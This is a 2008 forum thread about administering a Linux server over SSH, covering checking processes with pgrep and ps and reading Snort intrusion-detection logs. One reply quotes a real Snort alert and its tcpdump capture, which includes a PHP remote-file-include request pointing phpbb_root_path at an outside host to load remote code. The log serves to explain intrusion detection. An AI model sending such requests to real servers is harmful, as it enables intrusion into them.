SSHD on my linux box!

Lyecdevf · Post by **Lyecdevf** » 14 Jul 2008, 09:31

I enabled SSHD on my linux box and I used putty from my windows box to connect to it. I dropped into a shell. All well an fine until this! This is my server which runs all the time and I would like to check up on it from time to time if it is all working properly from basically any place in the world.

My question is if it is posible to do all administrative tasks from the shell. I have not used it hat much so I wonder how would I check for instance if Ktorrent is working fine of take a look at snort logs?

Post by **ayu** » 14 Jul 2008, 10:12

Well you do like you would normally do when working in a shell. I don't know if Ktorrent has anything else available then a GUI (never used it), but analysing snort logs should be just like usually. Just navigate to the log directory and check them.

I don't remember where the snort logs are placed, /var/log/snort maybe, but you would just have to nav to that folder and read them with an editor/reader of your choice, cat/vi/nano/emacs.

G-Brain · Post by **G-Brain** » 14 Jul 2008, 10:15

See if a process is running:

Code: Select all

pgrep ktorrent

or

Code: Select all

ps aux | grep ktorrent

I've never used snort, but I'm sure it can export logs to a plain text format, which you could then read with any command line text editor such as emacs.

All administrative tasks should be doable from the shell.

Post by **bad_brain** » 14 Jul 2008, 10:42

the snort logs are well readable in a shell, the logs are usually split into 2 parts: the alert log and the tcpdump log.
here is an example:
alert.log entry

Code: Select all

[**] [1:2002:7] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1] 
07/14-18:21:54.627780 216.227.218.118:52707 -> xxx.xxx.xxx.xxx:80
TCP TTL:51 TOS:0x8 ID:17524 IpLen:20 DgmLen:266 DF
***AP*** Seq: 0x7615CECD  Ack: 0xF3F481D9  Win: 0x16D0  TcpLen: 20

and here the tcpdump entry for the same incident

Code: Select all

GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://knightkittens.com/images/ma??? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.xxxxxxxxxxx.com
User-Agent: Mozilla/4.61 [en] (OS/2; U)

snort also has a mail notification that send you a summary of all incidents happended in the last 24 hours. if you prefer a shiny GUI check out snortalog, it converts the logs into HTML-format (but you have to use the "FULL" log format in the snort settings for it if I remember it right).

I recommend to work as much as possible in a shell anyway, best way to learn...

Lyecdevf · Post by **Lyecdevf** » 14 Jul 2008, 12:03

Hey, thanks a lot.

lyecdevf@linux:~> pgrep ktorrent
4037
lyecdevf@linux:~> ps aux | grep ktorrent
lyecdevf 4037 7.8 24.1 417608 250280 ? Dl Jul05 1050:23 ktorrent --icon=ktorrent -caption KTorrent
lyecdevf 6631 0.0 0.0 1764 552 pts/2 S+ 19:45 0:00 grep ktorrent
lyecdevf@linux:~>